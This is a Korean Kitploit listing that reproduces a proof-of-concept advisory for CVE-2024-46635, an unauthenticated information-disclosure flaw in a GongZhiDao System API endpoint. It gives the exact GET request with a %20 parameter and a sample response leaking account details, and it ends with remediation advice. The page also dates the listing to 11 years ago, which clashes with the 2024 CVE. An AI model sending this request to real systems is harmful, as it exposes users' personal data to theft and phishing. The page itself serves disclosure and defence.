Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-46635 — CVE-2024-46635에 대한 개념 증명: GongZhiDao System의 API 엔드포인트에서 부적절한 입력 검증 취약점으로 인증 없이 민감한 사용자 정보를 노출합니다. | Kitploit
도구/GitHubGitHub/h1thub/cve-2024-46635
Vulnerability AnalysisInformation GatheringWeb SecurityPenetration TestingMisconfigurationAPI Security
GitHubh1thub/cve-2024-46635

CVE-2024-46635

CVE-2024-46635에 대한 개념 증명: GongZhiDao System의 API 엔드포인트에서 부적절한 입력 검증 취약점으로 인증 없이 민감한 사용자 정보를 노출합니다.

저장소 보기
11년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-46635

배경

GongZhiDao System은 GongZhiDao에서 개발한 플랫폼입니다. 사용자 관리, 데이터 분석 및 운영 기능을 포함한 엔터프라이즈 솔루션을 제공합니다. 그러나 API 엔드포인트 중 하나에서 보안 취약점이 발견되어 적절한 인증 없이 민감한 사용자 정보가 노출될 가능성이 있습니다.

취약점 설명

GongZhiDao System의 /oaa/api/AccountMaster/GetCurrentUserInfo API 엔드포인트에 취약점이 존재합니다. UserNameOrPhoneNumber 매개변수 대신 %20(URL 인코딩된 공백)을 전달하면, API가 적절한 인증이나 권한 없이도 계정 ID, 사용자 이름, 이메일 주소를 포함한 민감한 사용자 정보를 응답합니다. 이러한 부적절한 입력 검증으로 인해 공격자가 민감한 데이터에 무단으로 접근할 수 있습니다.

영향

이 취약점을 성공적으로 악용하면 다음과 같은 민감한 사용자 데이터가 노출될 수 있습니다.

  • 계정 ID
  • 사용자 이름
  • 이메일 주소
  • 전화번호 (있는 경우)
  • 기타 개인 정보

공격자는 이 정보를 사용하여 신원 도용이나 피싱과 같은 추가 공격을 수행할 수 있습니다.

공격 벡터

취약점을 악용하려면 공격자는 취약한 API 엔드포인트에 조작된 HTTP GET 요청을 보내야 합니다.

root@kitploit:~
GET /oaa/api/AccountMaster/GetCurrentUserInfo?UserNameOrPhoneNumber=%20 HTTP/2

이 요청은 JSON 형식의 민감한 사용자 데이터와 함께 200 OK 응답을 반환합니다.

root@kitploit:~
HTTP/2 200 OK
Date: Tue, 10 Sep 2024 03:25:09 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 153
Server: nginx/1.22.0
X-Powered-By: ASP.NET
Set-Cookie: Path=/; HttpOnly; Secure

{"accountId":"09c05434-e1ff-4436-b1b0-01215e48b274","name":"John","phoneNumber":null,"userName":"19999999999","email1":"[email protected]"}

기술적 세부 사항

  • 영향을 받는 엔드포인트: /oaa/api/AccountMaster/GetCurrentUserInfo
  • 메서드: HTTP GET
  • 매개변수: UserNameOrPhoneNumber에 %20을 입력
  • 응답: API가 적절한 입력 검증이나 권한 없이 JSON 형식의 민감한 사용자 데이터를 반환합니다.
  • 취약점 유형: 부적절한 입력 검증 / 민감한 정보 노출

수정 권장 사항

  1. 적절한 입력 검증 구현: UserNameOrPhoneNumber 매개변수가 적절히 살균되고 검증되도록 하십시오. %20과 같은 입력은 거부되어야 합니다.

  2. 권한 확인: 인증되고 권한이 부여된 사용자만 민감한 정보에 접근할 수 있도록 적절한 권한 부여 메커니즘을 구현하십시오.

  3. 속도 제한 및 모니터링: API 엔드포인트에 속도 제한을 적용하여 무차별 대입 또는 자동화된 공격을 방지하고, 비정상적인 접근 패턴을 모니터링하십시오.

크레딧

이 취약점은 hithub에 의해 발견되었습니다.

참고 자료

  • CWE-20: 부적절한 입력 검증
도구 다운로드